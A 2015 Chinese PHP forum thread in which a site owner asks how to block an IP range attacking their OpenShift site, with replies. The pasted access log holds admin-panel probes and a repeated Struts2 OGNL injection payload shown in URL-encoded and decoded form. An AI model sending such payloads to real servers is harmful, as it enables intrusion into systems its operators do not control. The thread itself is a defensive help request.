已掉线,重新登录

首页 > 绿虎论坛 > 历史版块 > 编程 > PHP > 讨论/求助

标题: 被一个ip段疯狂攻击……

作者: @Ta

时间: 2015-11-18

点击: 5350

显示一个南京ip段…
用的openshift,.htaccess还禁止不了他!
各位虎友,该怎么办??
操作IP: 180.97.106.37|127.8.92.1
操作时间: 2015-11-18 20:57:54
来源页面:
请求页面:/phpMemcachedAdmin/index.php
操作页面:/404.php
提交方式: GET
提交参数: i
提交数据: phpMemcachedAdmin/index.php

操作IP: 180.97.106.162|127.8.92.1
操作时间: 2015-11-18 20:57:55
来源页面:
请求页面:/phpMemcachedAdmin/stats.php
操作页面:/404.php
提交方式: GET
提交参数: i
提交数据: phpMemcachedAdmin/stats.php

操作IP: 180.97.106.36|127.8.92.1
操作时间: 2015-11-18 20:58:03
来源页面:
请求页面:/uc_center/admin.php
操作页面:/404.php
提交方式: GET
提交参数: i
提交数据: uc_center/admin.php

操作IP: 180.97.106.162|127.8.92.1
操作时间: 2015-11-18 20:58:06
来源页面:
请求页面:/ThinkPHP/Tpl/think_exception.tpl
操作页面:/404.php
提交方式: GET
提交参数: i
提交数据: ThinkPHP/Tpl/think_exception.tpl

操作IP: 180.97.106.36|127.8.92.1
操作时间: 2015-11-18 21:00:07
来源页面:
请求页面:/?k=(%23context%5B%5C%22xwork.MethodAccessor.denyMethodExecution%5C%22%5D=new%20java.lang.Boolean%28false%29%2C%23_memberAccess%5B%5C%22allowStaticMethodAccess%5C%22%5D=new%20java.lang.Boolean%28true%29%2C%23_memberAccess.excludeProperties=%7B%7D%2C%23a_str=%27814F60BD-F6DF-4227-%27%2C%23b_str=%2786F5-8D9FBF26A2EB%27%2C%23a_resp=%40org.apache.struts2.ServletActionContext%40getResponse%28%29%2C%23a_resp.getWriter%28%29.println%28%23a_str%2B%23b_str%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29)(meh)&z[(k)('meh')]=true
操作页面:/index.php
提交方式: GET
提交参数: k
提交数据: (#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

操作IP: 180.97.106.36|127.8.92.1
操作时间: 2015-11-18 21:00:07
来源页面:
请求页面:/?k=(%23context%5B%5C%22xwork.MethodAccessor.denyMethodExecution%5C%22%5D=new%20java.lang.Boolean%28false%29%2C%23_memberAccess%5B%5C%22allowStaticMethodAccess%5C%22%5D=new%20java.lang.Boolean%28true%29%2C%23_memberAccess.excludeProperties=%7B%7D%2C%23a_str=%27814F60BD-F6DF-4227-%27%2C%23b_str=%2786F5-8D9FBF26A2EB%27%2C%23a_resp=%40org.apache.struts2.ServletActionContext%40getResponse%28%29%2C%23a_resp.getWriter%28%29.println%28%23a_str%2B%23b_str%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29)(meh)&z[(k)('meh')]=true
操作页面:/index.php
提交方式: GET
提交参数: z
提交数据: true

操作IP: 180.97.106.37|127.8.92.1
操作时间: 2015-11-18 21:00:08
来源页面:
请求页面:/
操作页面:/index.php
提交方式: POST
提交参数: k
提交数据: (#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

操作IP: 180.97.106.37|127.8.92.1
操作时间: 2015-11-18 21:00:08
来源页面:
请求页面:/
操作页面:/index.php
提交方式: POST
提交参数: z
提交数据: true

操作IP: 180.97.106.37|127.8.92.1
操作时间: 2015-11-18 21:00:09
来源页面:
请求页面:/?class.classLoader.jarPath=(%23context%5B%5C%22xwork.MethodAccessor.denyMethodExecution%5C%22%5D=new%20java.lang.Boolean%28false%29%2C%23_memberAccess%5B%5C%22allowStaticMethodAccess%5C%22%5D=new%20java.lang.Boolean%28true%29%2C%23_memberAccess.excludeProperties=%7B%7D%2C%23a_str=%27814F60BD-F6DF-4227-%27%2C%23b_str=%2786F5-8D9FBF26A2EB%27%2C%23a_resp=%40org.apache.struts2.ServletActionContext%40getResponse%28%29%2C%23a_resp.getWriter%28%29.println%28%23a_str%2B%23b_str%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29)(meh)&z[(class.classLoader.jarPath)('meh')]=true
操作页面:/index.php
提交方式: GET
提交参数: class_classLoader_jarPath
提交数据: (#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

操作IP: 180.97.106.37|127.8.92.1
操作时间: 2015-11-18 21:00:09
来源页面:
请求页面:/?class.classLoader.jarPath=(%23context%5B%5C%22xwork.MethodAccessor.denyMethodExecution%5C%22%5D=new%20java.lang.Boolean%28false%29%2C%23_memberAccess%5B%5C%22allowStaticMethodAccess%5C%22%5D=new%20java.lang.Boolean%28true%29%2C%23_memberAccess.excludeProperties=%7B%7D%2C%23a_str=%27814F60BD-F6DF-4227-%27%2C%23b_str=%2786F5-8D9FBF26A2EB%27%2C%23a_resp=%40org.apache

[隐藏样式|查看源码]


『回复列表(10|隐藏机器人聊天)』

1.
这是昨天的log,100多kb…
(/@Ta/2015-11-18 21:23//)

2. 不是我
(/@Ta/2015-11-18 21:30//)

3. 双手打字,以表清白
(/@Ta/2015-11-18 22:00//)

4.
用户被禁言,发言自动屏蔽。
(/@Ta/2015-11-18 22:52//
被禁言
)

5. {抠鼻}  [来自 HUAWEI hwH30(4G)]
(/@Ta/2015-11-18 23:18//)

6. 这是要黑你的节奏啊,挂个纯页面算了
(/@Ta/2015-11-19 04:13//)

7. 试试360
(/@Ta/2015-11-19 06:31//)

8. 凶残。。各种黑。。
(/@Ta/2015-11-19 10:09//)

9. @,360safe3.php拦不住,这是我从360提取一部分代码改了,自己拦截的。现在这个ip段跳转到http://127.0.0.1,让他自己玩吧!
(/@Ta/2015-11-20 08:50//)

10. 是我 是我
(/@Ta/2015-11-20 10:40//)

回复需要登录

9月18日 00:16 星期四

本站由hu60wap6驱动

备案号: 京ICP备18041936号-1